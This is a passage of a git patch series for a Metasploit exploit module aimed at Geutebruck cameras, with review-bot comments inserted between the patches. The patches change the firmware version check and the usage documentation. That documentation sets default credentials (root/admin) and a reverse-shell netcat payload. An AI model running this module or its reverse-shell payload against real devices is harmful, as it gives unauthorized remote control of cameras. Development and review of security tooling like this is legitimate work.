a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -70,7 +70,6 @@ class MetasploitModule < Msf::Exploit::Remote res_xml = res.get_xml_document @version = res_xml.at('//firmware').text - return true end end From 898f94320c5a694f33195f139d28a0409d52d041 Mon Sep 17 00:00:00 2001 
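Review bot: The new `check` uses `version < Gem::Version.new('1.12.0.25')`, while the module description and the documentation say firmware versions `<= 1.12.0.25` are affected, so a device on exactly 1.12.0.25 is reported Safe; either the comparison should be `<=` or the description should say `<`, and the same line is carried forward unchanged into PATCH 16 and PATCH 19. In `firmware`, `res_xml.at('//firmware').text` is dereferenced without a nil check, so a response that is not the expected brand.xml (a different device or a captive page on the port) raises NoMethodError instead of yielding Unknown; guard it with `node = res_xml.at('//firmware')` and `return CheckCode::Unknown unless node` before reading `node.text`. The `begin … end` around the request no longer has a `rescue`, so the earlier `::Rex::ConnectionError` handling is gone — acceptable only if the framework's check driver rescues it, otherwise it should be restored.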
From: gwillcox-r7 Date: Fri, 14 Aug 2020 17:18:31 -0500 Subject: [PATCH 16/20] Add in fixes to check method so that the code will return the correct status if the connection fails --- .../exploits/linux/http/geutebruck_testaction_exec.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index c49211453a..a268d10af6 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -70,16 +70,17 @@ class MetasploitModule < Msf::Exploit::Remote res_xml = res.get_xml_document @version = res_xml.at('//firmware').text + return true end end def check - firmware + result = firmware + return result unless result.true? + version = Gem::Version.new(@version) vprint_status "Found Geutebruck version #{version}" - if version < Gem::Version.new('1.12.0.25') || - version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5') - + if version < Gem::Version.new('1.12.0.25') || Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5') return CheckCode::Appears end @@ -96,5 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote } ) end - end From 896c8aacae9e2d252ee6aad017f630a4adc204e8 Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Fri, 14 Aug 2020 17:27:39 -0500 Subject: [PATCH 17/20] Add in AutoCheck mixin so that we ensure targets are vulnerable before attempting to exploit them. --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index a268d10af6..04c16eb58a 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb 
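Review bot: The rewritten `if` has lost `version ==` in front of the second comparison: `Gem::Version.new('1.12.13.2')` is an object and therefore always truthy, so every device that answers brand.xml is reported Appears; the line should read `if version < Gem::Version.new('1.12.0.25') || version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5')`. `result.true?` is not a method on TrueClass, so `check` raises NoMethodError before reaching the comparison; `return result unless result == true` is what is meant. More broadly, `firmware` now returns either `true` or a `CheckCode` and leaves its real result in `@version`; returning the version string (nil on failure) would remove the mixed return type and the instance variable, leaving `check` to do `return CheckCode::Unknown unless version_str`.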
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager + prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( From 1da359ee01cf1cead2ac3ed42c7d6c51cfaa8180 Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Fri, 14 Aug 2020 17:49:02 -0500 Subject: [PATCH 18/20] Merge with last fix. This fix just fixes a issue with a method call as I tried calling the nonexistant method .true? --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index 04c16eb58a..f1490bf604 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote def check result = firmware - return result unless result.true? + return result unless result == true version = Gem::Version.new(@version) vprint_status "Found Geutebruck version #{version}" From 93fa66bfc557a9bc34c33cbf80622c64e405e5b3 Mon Sep 17 00:00:00 2001 From: ddouhine Date: Sat, 15 Aug 2020 00:56:53 +0200 Subject: [PATCH 19/20] Update geutebruck_testaction_exec.rb And a fix for the fix ;) I guess now everything will work as intended ! --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index f1490bf604..616928e2df 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb 
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote version = Gem::Version.new(@version) vprint_status "Found Geutebruck version #{version}" - if version < Gem::Version.new('1.12.0.25') || Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5') + if version < Gem::Version.new('1.12.0.25') || version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5') return CheckCode::Appears end From 8f80d9b8b6b093e0856c15c5f34b4d2387efde85 Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Mon, 17 Aug 2020 09:12:02 -0500 Subject: [PATCH 20/20] Minor updates to the documentation to reflect the fact that the username and password could be something other than root/admin --- .../modules/exploit/linux/http/geutebruck_testaction_exec.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md index ab009e1823..0ebb8d378d 100644 --- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md @@ -42,8 +42,8 @@ Users can find additional details of this vulnerability on the advisory page at 1. Start the camera using default configuration 2. Launch msfconsole 3. Do: `use exploit/linux/http/geutebruck_testaction_exec` - 4. Do: `set httpusername root` - 5. Do: `set httppassword admin` + 4. Do: `set httpusername ` + 5. Do: `set httppassword ` 6. Do: `set lhost ` 5. Do: `set rhosts ` 6. Do: `set payload cmd/unix/reverse_netcat_gaping`